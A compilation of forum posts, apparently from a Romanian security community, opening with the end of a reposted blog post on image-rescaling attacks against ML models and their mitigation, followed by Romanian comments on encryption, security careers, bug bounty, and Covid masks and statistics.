(as pre-processing rescales images) Model queries: The model might predict on a different image than the one the user uploaded Non ML related attacks: This can also be an issue in other, non machine learning areas. I guess security never gets boring, there is always something new to learn. Mitigations Turns out that Husky AI uses PIL and that was not vulnerable to this attack by default. I got lucky, because initially Husky AI did use OpenCV and it’s default settings to resize images. But for some reason I changed that early on (not knowing it would also mitigate this attack). If you use OpenCV the issue can be fixed by using the interpolation argument when calling the resize API to not have it use the default. Hope that was useful and interesting. Cheers, Johann. @wunderwuzzi23 References Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning (https://www.usenix.org/system/files/sec20-quiring.pdf) (Erwin Quiring, TU Braunschweig) https://github.com/EQuiw/2019-scalingattack Sursa: https://embracethered.com/blog/posts/2020/husky-ai-image-rescaling-attacks/

De multe ori autoritatile nu primesc nicio cheie si cauta solutii alternative. Ca in cazul parolei unui iPhone a unuia pe care il arestasera, au facut NAND mirroring ca sa crackuiasca PIN-ul. Si nu o sa se ajunga niciodata (in tarile civilizate) ca autoritatile sa aiba acces la astfel de "chei" (Root CA-uri ma refer) deoarece ar fi o incalcare grava a dreptului la intimitate si s-ar putea abuza foarte usor. De aceea exista persoane si ONG-uri ca EFF sa ne apere de astfel de lucruri.

Nu am mai auzit nimic referitor la el.

Admini de la ce? Ce site?

E interesanta vulnerabilitatea, pacat insa ca nu e foarte practica: "The issue occurs when a sysadmin inserts an entry into the sudoers file, for example: jacob myhost = (ALL, !root) /usr/bin/chmod"

Va stresati prea rau cu atacurile astea pe protocoale de encriptie. Cam toate sunt bine implementate de persoane care stiu ce fac si daca sunt atacuri disponibile, ca cele de prin TLS, acestea se pot exploata DOAR in cine stie ce conditii sau se pot obtine date cu cine stie ce supercomputer. Cat despre clasicul TLS si clasicul PKI, unde exista multe Root CA-uri, aici se pot face lucruri mai simple si eficiente. Adica daca cineva chiar vrea sa targeteze pe cineva, nu o sa se complice pe atacuri de WhatsApp, Signal sau Telegram cand poate incerca cel putin atacuri simple pe TLS care necesita acces la un Root CA. Dar victimele se pot prinde de asta, au fost firme "suspecte" care au vrut sa devina Root CA si atacul necesita acces la un Root CA... Dar rezultatul poate fi acces la toate aplicatiile, in principal browsere, care nu implementeaza SSL/TLS pinning. Si pana si aplicatiile bancare fac asta. Si nu are niciun rezultat cand e vorba de end to end encryption. Pentru tinte "high profile" se cumpara pe milioane de dolari exploit-uri de iOS/Android.

Sigur, daca ii dai telefonul cu mesajele. Tot ce trebuie sa faca e sa gaseasca aplicatia WhatsApp si sa o deschida.

Prin acel Gigel ma referisem la contul de Twitter al lui https://twitter.com/Dredekia care comentase la acel post. Ok,a marxism, neomarxism, fascism, antifascism, ce o fi. Cine si ce anume are de castigat? Ce se vrea de fapt? Ce interese mari sunt la mijloc? Asa pot spune si eu despre mine ca vin cu ideile mele pentru a provoca nytroxismul. Am interese mari la mijloc.

Ok, vad un tweet de la WEF (irelevant ce este in context, nu stiam de asa ceva oricum) si un Gigel de pe net care zice ceva despre "global reset". Sincer, nu am mai auzit despre asta, zi-ne pe scurt despre ce e vorba si ce legatura are cu Covid, chiar nu stiu. Eu ma gandesc doar ca cineva a sunat la IT Support-ul lui Dumnezeu, i-a zis de problema, si IT support-ul i-a zis "Did you try to reset it?" iar acel cineva vrea sa dea reset Pamantului.

Oh, nici nu stiam ca e tot de la ei.

FAQ aici: https://www.who.int/influenza/human_animal_interface/avian_influenza/h5n1_research/faqs/en/ Cercel (sau cine a scris acel articol) a uitat sa ia in considerare modul de raspandire, dar rata de deces e mare. Cu timpul o sa le aflam pe toate.

Am vazut la cineva pe Linkedin, aparent exista asta: https://lege5.ro/Gratuit/gmztknrygq2q/lista-certificarilor-profesionale-agreate-pentru-efectuarea-testelor-de-penetrare-ordin-553-2019?dp=gi4dqmzyhe2tkoa Sunt socat, nu m-as fi asteptat sa existe asa ceva la noi in legislatie. De fapt, este in legislatie? Si priviti si partea buna: CEH nu e acolo

@shitshow - Vad ca e o teorie conspirationista dar nu am timp sa ma informez despre lucruri inutile, in loc de copy/paste scrie pe scurt despre ce e vorba, nu prea inteleg. @gigiRoman - Ok, deci mor 250.000 de romani anual. De la Covid ar muri inca atatia, deci am ajunge la 500.000 de decese pe an. Am inteles. Da, impactul economic e nasol pentru toata lumea. Nu avem ce face... Si daca e vorba despre a scadea numarul de cazuri si daca e vorba de a diminua impactul economic rezultatul e acelasi: nu exista solutie care sa rezolve complet aceste probleme. Sunt prea multe "necunoscute" si depindem de prea multe lucruri, in mare parte de "oameni".

Da, e foarte important. Eu cand am fost la interviuri, persoanele care ma intervievau: 1. Stiau de mine de pe forum si prezentat la Defcamp 2. Persoana cu care am discutat mi-a zis ca ma urmarea pe Twitter (alte persoane de acolo stiau de asemenea de mine) 3. Ma stiau pentru ca am prezentat la OWASP si Defcon + Github (NetRipper) 4. Ma cunoscusem cu una dintre ele la o conferinta si stiau cate ceva despre prezentari/blog/RST/proiecte Conteaza mult. Trebuie sa demonstrezi ceea ce stii, degeaba treci in CV ca stii mii de lucruri daca nu le demonstrezi, ca si cum ai aplica pe o pozitie de web designer si ai zice ca ai facut sute de site-uri dar nu arati niciunul. PS: Cam la toate firmele la care am lucrat am participat la interviurile de angajare pentru pozitii noi. Activitatea pe forum, prezentari, tutoriale, tool-uri au reprezentat intotdeauna un punct in plus din partea mea. Daca va place domeniul, o sa faceti cate ceva. Cum ziceau suporterii dinamovisti intr-un mesaj: "Pasiunea > Ratiunea".

Salut si bine ai venit! Partea de bug bounty nu mai merge atat de bine ca in trecut pentru ca sunt extrem de multe persoane care fac asta, din toata lumea. Si pe langa asta, multe dintre ele fac asta "non-stop" adica poate mai mult de 8 ore pe zi. Multi sunt idioti care raporteaza numai mizerii dar sunt si multi buni care fac o gramada de bani. Eu nu iti recomand asta pe post de "cariera" din simplul motiv ca nu e ceva stabil. Cel putin nu la inceput. E mai bine sa ai un job cu venit stabil si in timpul liber sa faci bug bounty. Apoi, daca treaba merge bine poti renunta la job sa faci bug bounty full time. Problema e ca te trezesti ca nu mai ai bani si ca... nu gasesti nimic si asa apare presiunea si stresul. Ah, da, desigur, pentru succes pe partea asta trebuie sa o faci pe programe private sau pe programe unde nu au mai sarit mii de oameni pe ele. Cat despre job, la fel ca la orice alt job, e mai greu la inceput. Si pe dev poate fi greu sa gasesti prima pozitie, nu te da batut si "arata ce poti" in CV. Fa bug bounty, fa proiecte, fa un research, scrie un tutorial, orice. O sa dea bine la CV. Multe firme cauta persoane cu experienta pentru ca au nevoie rapid de rezultate. Si la firma la care lucrez am avut nevoie la fel, de cineva senior, care sa vina, sa stea o saptamana si apoi poc, la treaba, singur, fara ajutor. Dar sunt si firme care nu au "graba" aceasta, trebuie doar sa ai rabdare si sa iesi in fata altor persoane, sa demonstrezi ceea ce stii direct din CV. PS: Sper ca in CV ai pus ceea ce ne-ai zis mai sus.

Criza nu va disparea prea curand, nici la inceputul anului viitor inclusiv in cazul in care apare un vaccin bun. Nu exista statisticile astea pe care le vrei tu si nu vor exista vreodata. Pentru a avea totul ca la carte trebuie sa testezi toata populatia, sa vezi ce job au toti, cum au calatorit, cate persoane au intalnit, cu cate persoane au stat x minute de vorba si mai stiu eu ce. Eu nu stiu ce am facut saptamana trecuta... Ai aici statisticile disponibile: https://datelazi.ro/ Din 210.000 de persoane au murit 6400. Daca Romania are 21.000.000 populatia inseamna ca daca ne-am infecta toti romanii ar muri 640.000 de persoane. Sase sute patru zeci de mii. Bine, asta e doar teoretic, normal, ca sunt multi asimptomatici care nici nu stiu ca au fost infectati. Dar tot s-ar ajunge la un numar de 210.000 de decese (sa zicem). Adica 1%. Asta inseamna ca din cei 300 de "prieteni" de pe Facebook imi mor 3. Asta inseamna ca din 500 de useri activi de pe forum mor 5. Vi se pare putin? Mie nu. Nu cred ca de gripa mor atati romani. De fapt e clar asta. Si asta in conditiile in care sunt X masuri luate de care oamenii tot se plang. Ah, sper sa nu incepeti ca mor X persoane anual de cancer ca fac infarct...

Exemplu de protocol bine pus la punct: https://signal.org/docs/ Sau cel folosit de catre Telegram: https://core.telegram.org/mtproto Discutie legata de o comparatie intre ele: https://crypto.stackexchange.com/questions/31418/signal-vs-telegram-in-terms-of-protocols

Am purtat si eu masca sambata, continuu, 09:00 - 19:00 si nu am patit absolut nimic. Exemplul meu era o analogie, nu era o gluma. 1. Consecinta e ca nu te pisi pe celalalt, care e nevinovat 2. Aceti "cativa" sunt foarte multi si nu stiu ca se pisa pe ei. Si se mai si pisa des 3. Pentru ca nu au costume spatiale si nu e garantat ca nu se pot infecta. Un medic care s-a infectat a declarat ca doar si-a dat jos echipamentul in camera de dezechipare si de acolo a luat, dar se poate luat dintr-un milion de alte locuri, inclusiv de la spital (unde e spatiu inchis cu zeci de persoane confirmate pozitiv) si din afara spitalului (magazin, autobuz etc). Nu am vazut pe nimeni sa fie haituit sau speriat ca poarta o mizerie de hartie/textil la gura. Nu am vazut nici politie alergand dupa cineva iar eu nu am avut nicio problema cu absolut nimic de cand e criza asta si port masca. De fapt e bine, nu vede lumea cat de urat sunt. (Glumesc, sunt handsome) Edit: Eu consider ca multi oameni nu prea cred in acest virus si in grvitatea sa din cauza ca nu stiu ei personal persoane infectate. Mai lasati si voi laptop-urile si vorbiti cu oamenii. Eu stiu personal cel putin 10 persoane care au fost infectate, iar in weekend am mai aflat de vreo 4-5. Rude. Unele au avut simptome mai usoare altele... nu chiar.

Super, detalii pentru aplicare sunt aici: https://rstcon.com/cfp/

Legat de porcariile astea cu masca... Haideti sa facem un experiment. Se intalnesc doua persoane. Si se pisa una pe alta, la propriu. Una cu pantaloni pe ea, cealalta fara. Se se intampla? La fel se pun intrebarile: ce se intampla daca ambele persoane au pantaloni sau daca niciuna dintre ele nu are pantaloni? La fel si cu masca. Nu trebuie sa ai studii medicale sa intelegi ca daca porti ceva pe gura si vorbesti (de exemplu cu scuipat), tusesti, sau stranuti, orice ai avea pe fata te ajuta sa nu dai mai departe ce iti iese pe gura. Plm, parca ati crescut in copaci.